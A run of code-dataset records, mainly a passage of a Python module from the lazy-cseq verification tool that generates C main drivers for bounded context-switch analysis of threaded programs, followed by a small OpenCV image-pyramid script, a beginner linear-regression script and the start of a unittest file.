Last called to main\n '''\n\n # For the last call to main thread\n k = int(math.floor(math.log(self.__lines['main'],2)))+1\n main += \" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (ROUNDS, self.__extra_nondet)\n self._bitwidth['main','__cs_tmp_t0_r%s' % (ROUNDS)] = k\n # main +=\" __CSEQ_assume(__cs_tmp_t0_r%s >= 0);\\n\" % (ROUNDS)\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs_0 = __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n else:\n main +=\" __cs_pc_cs_0 = __cs_pc_0 + __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n main +=\" __CSEQ_assume(__cs_pc_cs_0 >= __cs_pc_0);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs_0 <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" }\\n\"\n main += \" return 0;\\n\"\n main += \"}\\n\\n\"\n\n return main\n\n def __createMainOnePCCS(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n\n ''' Part I:\n Pre-guessed jump lengths have a size in bits depending on the size of the thread.\n '''\n\n maxsize = 0\n for t in self.__lines:\n maxsize = max(maxsize, int(self.__lines[t]))\n k = int(math.floor(math.log(maxsize,2)))+1\n\n for r in range(0, ROUNDS):\n for t in range(0,self.__threadbound+1):\n # threadsize = self.__lines[self.__threadName[t]]\n # k = int(math.floor(math.log(threadsize,2)))+1\n self._bitwidth['main','__cs_tmp_t%s_r%s' % (t,r)] = k\n\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" unsigned int __cs_tmp_t0_r0;\\n\"\n main +=\" __CSEQ_assume(__cs_tmp_t0_r0 > 0);\\n\"\n main +=\" __cs_pc_cs = __cs_tmp_t0_r0;\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_last_thread = 0;\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs;\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r0;\\n\" % (i)\n # main +=\" __CSEQ_assume(__cs_tmp_t%s_r0 >= 0);\\n\" % (i)\n main +=\" unsigned int __cs_run_t%s_r0 = (__cs_tmp_t%s_r0 && (__cs_active_thread[%s] == 1));\\n\" % (i, i, i)\n self._bitwidth['main','__cs_run_t%s_r0' % (i)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t%s_r0) {\\n\" % (i)\n main +=\" __cs_pc_cs = __cs_tmp_t%s_r0;\\n\" % (i)\n main +=\" __CSEQ_assume(__cs_pc_cs_%s <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_last_thread = %s;\\n\" % (i)\n main +=\" __cs_pc[%s] = __cs_pc_cs;\\n\" % (i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" __CSEQ_assume(__cs_last_thread != 0);\\n\"\n main +=\" unsigned int __cs_tmp_t0_r%s;\\n\" % (round)\n # main +=\" __CSEQ_assume(__cs_tmp_t0_r%s >= 0);\\n\" % (round)\n main +=\" unsigned int __cs_run_t0_r%s = (__cs_tmp_t0_r%s && (__cs_active_thread[0] == 1));\\n\" % (round, round)\n self._bitwidth['main','__cs_run_t0_r%s' % (round)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t0_r%s) {\\n\" % (round)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs = __cs_tmp_t0_r%s;\\n\" % (round)\n else:\n main +=\" __cs_pc_cs = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (round)\n main +=\" __CSEQ_assume(__cs_pc_cs >= __cs_pc_0);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_last_thread = 0;\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs;\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" __CSEQ_assume(__cs_last_thread != %s);\\n\" % (i)\n main +=\" unsigned int __cs_tmp_t%s_r%s;\\n\" % (i, round)\n # main +=\" __CSEQ_assume(__cs_tmp_t%s_r%s >= 0);\\n\" % (i, round)\n main +=\" unsigned int __cs_run_t%s_r%s = (__cs_tmp_t%s_r%s && (__cs_active_thread[%s] == 1));\\n\" % (i, round, i, round, i)\n self._bitwidth['main','__cs_run_t%s_r%s' % (i, round)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t%s_r%s) {\\n\" % (i, round)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs = __cs_tmp_t%s_r%s;\\n\" % (i, round)\n else:\n main +=\" __cs_pc_cs = __cs_pc_%s + __cs_tmp_t%s_r%s;\\n\" % ( i, i, round)\n main +=\" __CSEQ_assume(__cs_pc_cs >= __cs_pc_%s);\\n\" % (i)\n main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_last_thread = %s;\\n\" % (i)\n main +=\" __cs_pc[%s] = __cs_pc_cs;\\n\" % (i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n # k = int(math.floor(math.log(self.__lines['main'],2)))+1\n main += \" unsigned int __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n self._bitwidth['main','__cs_tmp_t0_r%s' % (ROUNDS)] = k\n # main +=\" __CSEQ_assume(__cs_tmp_t0_r%s >= 0);\\n\" % (ROUNDS)\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs = __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n else:\n main +=\" __cs_pc_cs = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n main +=\" __CSEQ_assume(__cs_pc_cs >= __cs_pc[0]);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" }\\n\"\n main += \" return 0;\\n\"\n main += \"}\\n\\n\"\n\n return main\n\n def __createMainRoundRobin(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n\n ''' Part I:\n Pre-guessed jump lengths have a size in bits depending on the size of the thread.\n '''\n for r in range(0, ROUNDS):\n for t in range(0,self.__threadbound+1):\n threadsize = self.__lines[self.__threadName[t]]\n k = int(math.floor(math.log(threadsize,2)))+1\n self._bitwidth['main','__cs_tmp_t%s_r%s' % (t,r)] = k\n\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" unsigned int __cs_tmp_t0_r0 %s;\\n\" % self.__extra_nondet\n main +=\" __cs_pc_cs[0] = __cs_tmp_t0_r0;\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs[0] > 0);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs[0] <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs[0];\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r0 %s;\\n\" % (i, self.__extra_nondet)\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs[%s] = __cs_tmp_t%s_r0;\\n\" % (i, i)\n main +=\" __CSEQ_assume(__cs_pc_cs[%s] <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc[%s] = __cs_pc_cs[%s];\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (round, self.__extra_nondet)\n main +=\" if (__cs_active_thread[0]) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs[0] = __cs_tmp_t0_r%s;\\n\" % (round)\n else:\n main +=\" __cs_pc_cs[0] = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (round)\n main +=\" __CSEQ_assume(__cs_pc_cs[0] >= __cs_pc[0]);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs[0] <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs[0];\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r%s %s;\\n\" % (i, round, self.__extra_nondet)\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs[%s] = __cs_tmp_t%s_r%s;\\n\" % (i, i, round)\n else:\n main +=\" __cs_pc_cs[%s] = __cs_pc[%s] + __cs_tmp_t%s_r%s;\\n\" % (i, i, i, round)\n main +=\" __CSEQ_assume(__cs_pc_cs[%s] >= __cs_pc[%s]);\\n\" % (i, i)\n main +=\" __CSEQ_assume(__cs_pc_cs[%s] <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc[%s] = __cs_pc_cs[%s];\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n k = int(math.floor(math.log(self.__lines['main'],2)))+1\n main += \" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (ROUNDS, self.__extra_nondet)\n self._bitwidth['main','__cs_tmp_t0_r%s' % (ROUNDS)] = k\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs[0] = __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n else:\n main +=\" __cs_pc_cs[0] = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n main +=\" __CSEQ_assume(__cs_pc_cs[0] >= __cs_pc[0]);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs[0] <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" }\\n\"\n main += \" return 0;\\n\"\n main += \"}\\n\\n\"\n\n return main\n\n def __createMain(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n\n ''' Part I:\n Pre-guessed jump lengths have a size in bits depending on the size of the thread.\n '''\n for r in range(0, ROUNDS):\n for t in range(0,self.__threadbound+1):\n threadsize = self.__lines[self.__threadName[t]]\n k = int(math.floor(math.log(threadsize,2)))+1\n self._bitwidth['main','__cs_tmp_t%s_r%s' % (t,r)] = k\n\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" unsigned int __cs_tmp_t0_r0 %s;\\n\" % self.__extra_nondet\n main +=\" __CSEQ_assume(__cs_tmp_t0_r0 > 0);\\n\"\n main +=\" __cs_pc_cs[0] = __cs_tmp_t0_r0;\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs[0] <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_last_thread = 0;\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs[0];\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r0 %s;\\n\" % (i, self.__extra_nondet)\n main +=\" unsigned int __cs_run_t%s_r0 = (__cs_tmp_t%s_r0 && (__cs_active_thread[%s] == 1));\\n\" % (i, i, i)\n self._bitwidth['main','__cs_run_t%s_r0' % (i)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t%s_r0) {\\n\" % (i)\n main +=\" __cs_pc_cs[%s] = __cs_tmp_t%s_r0;\\n\" % (i, i)\n main +=\" __CSEQ_assume(__cs_pc_cs[%s] <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_last_thread = %s;\\n\" % (i)\n main +=\" __cs_pc[%s] = __cs_pc_cs[%s];\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" __CSEQ_assume(__cs_last_thread != 0);\\n\"\n main +=\" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (round, self.__extra_nondet)\n main +=\" unsigned int __cs_run_t0_r%s = (__cs_tmp_t0_r%s && (__cs_active_thread[0] == 1));\\n\" % (round, round)\n self._bitwidth['main','__cs_run_t0_r%s' % (round)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t0_r%s) {\\n\" % (round)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs[0] = __cs_tmp_t0_r%s;\\n\" % (round)\n else:\n main +=\" __cs_pc_cs[0] = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (round)\n main +=\" __CSEQ_assume(__cs_pc_cs[0] >= __cs_pc[0]);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs[0] <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_last_thread = 0;\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs[0];\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" __CSEQ_assume(__cs_last_thread != %s);\\n\" % (i)\n main +=\" unsigned int __cs_tmp_t%s_r%s %s;\\n\" % (i, round, self.__extra_nondet)\n main +=\" unsigned int __cs_run_t%s_r%s = (__cs_tmp_t%s_r%s && (__cs_active_thread[%s] == 1));\\n\" % (i, round, i, round, i)\n self._bitwidth['main','__cs_run_t%s_r%s' % (i, round)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t%s_r%s) {\\n\" % (i, round)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs[%s] = __cs_tmp_t%s_r%s;\\n\" % (i, i, round)\n else:\n main +=\" __cs_pc_cs[%s] = __cs_pc[%s] + __cs_tmp_t%s_r%s;\\n\" % (i, i, i, round)\n main +=\" __CSEQ_assume(__cs_pc_cs[%s] >= __cs_pc[%s]);\\n\" % (i, i)\n main +=\" __CSEQ_assume(__cs_pc_cs[%s] <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_last_thread = %s;\\n\" % (i)\n main +=\" __cs_pc[%s] = __cs_pc_cs[%s];\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n k = int(math.floor(math.log(self.__lines['main'],2)))+1\n main += \" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (ROUNDS, self.__extra_nondet)\n self._bitwidth['main','__cs_tmp_t0_r%s' % (ROUNDS)] = k\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs[0] = __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n else:\n main +=\" __cs_pc_cs[0] = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n main +=\" __CSEQ_assume(__cs_pc_cs[0] >= __cs_pc[0]);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs[0] <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" }\\n\"\n main += \" return 0;\\n\"\n main += \"}\\n\\n\"\n\n return main\n\n\n #######################################################################################################\n #######################################################################################################\n #######################################################################################################\n #######################################################################################################\n #######################################################################################################\n #######################################################################################################\n #######################################################################################################\n def __createMainKLEERoundRobinDecomposePC(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" __cs_pc_cs_0 = klee_range(1, %s, \\\"__cs_pc_cs_0\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc_0 = __cs_pc_cs_0;\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs_%s = klee_range(0, %s, \\\"__cs_pc_cs_%s\\\");\\n\" % (i, self.__lines[t] + 1, i)\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc_%s = __cs_pc_cs_%s;\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" if (__cs_active_thread[0]) {\\n\"\n main +=\" __cs_pc_cs_0 = klee_range(__cs_pc_0, %s, \\\"__cs_pc_cs_0\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc_0 = __cs_pc_cs_0;\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs_%s = klee_range(__cs_pc_%s, %s, \\\"__cs_pc_cs_%s\\\");\\n\" % (i, i, self.__lines[t] + 1, i)\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc_%s = __cs_pc_cs_%s;\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n main +=\" __cs_pc_cs_0 = klee_range(__cs_pc_0, %s, \\\"__cs_pc_cs_0\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" }\\n\"\n main += \" return 0;\\n\"\n main += \"}\\n\\n\"\n\n return main\n\n def __createMainKLEERoundRobinOnePCCS(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" __cs_pc_cs = klee_range(1, %s, \\\"__cs_pc_cs\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs;\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs = klee_range(0, %s, \\\"__cs_pc_cs\\\");\\n\" % (self.__lines[t] + 1)\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc[%s] = __cs_pc_cs;\\n\" % (i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" if (__cs_active_thread[0]) {\\n\"\n main +=\" __cs_pc_cs = klee_range(__cs_pc[0], %s, \\\"__cs_pc_cs\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs;\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs = klee_range(__cs_pc[%s], %s, \\\"__cs_pc_cs\\\");\\n\" % (i, self.__lines[t] + 1)\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc[%s] = __cs_pc_cs;\\n\" % (i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n main +=\" __cs_pc_cs = klee_range(__cs_pc[0], %s, \\\"__cs_pc_cs\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" }\\n\"\n main += \" return 0;\\n\"\n main += \"}\\n\\n\"\n\n return main\n\n def __createMainKLEERoundRobin(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" __cs_pc_cs[0] = klee_range(1, %s, \\\"__cs_pc_cs[0]\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs[0];\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs[%s] = klee_range(0, %s, \\\"__cs_pc_cs[%s]\\\");\\n\" % (i, self.__lines[t] + 1, i)\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc[%s] = __cs_pc_cs[%s];\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" if (__cs_active_thread[0]) {\\n\"\n main +=\" __cs_pc_cs[0] = klee_range(__cs_pc[0], %s, \\\"__cs_pc_cs[0]\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs[0];\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs[%s] = klee_range(__cs_pc[%s], %s, \\\"__cs_pc_cs[%s]\\\");\\n\" % (i, i, self.__lines[t] + 1, i)\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc[%s] = __cs_pc_cs[%s];\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n main +=\" __cs_pc_cs[0] = klee_range(__cs_pc[0], %s, \\\"__cs_pc_cs[0]\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" }\\n\"\n main += \" return 0;\\n\"\n main += \"}\\n\\n\"\n\n return main\n\n\n # Checks whether variable v from function f is a pointer.\n #\n def __isPointer(self, f, v):\n if self.__donotcheckpointer: return False\n if v in self.Parser.varNames[f] and self.Parser.varType[f,v].endswith('*'): return True\n elif v in self.Parser.varNames[''] and self.Parser.varType['',v].endswith('*'): return True\n else: return False\n\n\n # Checks whether variable v from function f is global.\n #\n def __isGlobal(self, f, v):\n if (v in self.Parser.varNames[''] and v not in self.Parser.varNames[f]): return True\n else: return False\n\n\n # Check whether the given AST node accesses global memory or uses a pointer.\n #\n # TODO: this overapproximation is very rough,\n # (variable dependency, pointer analysis etc,\n # could be useful for refinement)\n #\n def __globalAccess(self, stmt):\n if self.__atomic: return False # if between atomic_begin() and atomic_end() calls no context switchs needed..\n\n oldStmtCount = self.__stmtCount # backup counters\n oldMaxInCompound = self.__maxInCompound\n oldGlobalMemoryAccessed = self.__globalMemoryAccessed\n\n globalAccess = False\n self.__globalMemoryAccessed = False\n\n if type(stmt) not in (pycparser.c_ast.If, ):\n tmp = self._generate_stmt(stmt)\n else:\n tmp = self._generate_stmt(stmt.cond)\n\n globalAccess = self.__globalMemoryAccessed\n\n self.__stmtCount = oldStmtCount # restore counters\n self.__maxInCompound = oldMaxInCompound\n self.__globalMemoryAccessed = oldGlobalMemoryAccessed\n\n return globalAccess\n\n","sub_path":"examples/litmus/c/lazy-cseq-2.0/modules/lazyseqnewschedule.py","file_name":"lazyseqnewschedule.py","file_ext":"py","file_size_in_byte":79767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"920568","text":"import cv2\n\nimg_path = 'F:\\OpenCVDataSet\\misc\\lena_color_256.tif'\nimg = cv2.imread(img_path)\ncv2.imshow('Lena', img)\n\n'''\nIMAGE PYRAMID EX:\n'''\nsmaller = cv2.pyrDown(img)\nlarger = cv2.pyrUp(img)\ncv2.imshow('Smaller', smaller)\ncv2.imshow('Larger', larger)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"openCV_basic_concept/image-pyramid.py","file_name":"image-pyramid.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"408964984","text":"import pandas\nfrom sklearn import linear_model \n\n\n#read csv file using pandas## pd.read_csv is also fine\ndataset = pandas.read_csv(\"dataset_3_outputs.csv\")\n#set everything equals to a variable called 'dataset', and it will contain everything incide it\n\n#print(dataset)\n\n#read the first collumn\n#0- 0 collumn\n# : you target for the whole collumn\n# [0,0] is for collumn 0 and row 0, which locates a single number. to reveal it, dont need to include \".values\"1d\ntarget = dataset.iloc[:,0].values\ntarget1 = dataset.iloc[0,0]\n\ndata = dataset.iloc[:,3:9].values\n# 6 collumn\n\n#print(data)\n\nmachine = linear_model.LinearRegressoin() \n#set up linear machine#\nmachine.fit(data, target)\n\nprint(machine)\n\n#same collumn with the my data\nnew_data = [\n\t[0.01, -0.2, 0.5, 1.1, 0, 0],#1st object\n\t[-0.5, -0.1, 0.44, -0.9, 1, 0.5] #2nd object\n]\n\nnew_target = machine.predict(new_data)\n\nprint(new_target)\n\n\n","sub_path":"run_regression.py","file_name":"run_regression.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"27281952","text":"import os\nimport unittest\nfrom openeo_pg_parser.translate import translate_process_graph\n\n\nclass TranslateTester(unittest.TestCase):\n \"\"\" Testing the module `translate` for different process graph translations. \"\"\"\n\n def setUp(self):\n \"\"\" Setting up variables for one test. \"\"\"\n self.pg_dirpath = os.path.join(os.path.dirname(__file__), 'process_graphs')\n self.uc1_polarization_pg_filepath = os.path.join(self.pg_dirpath, 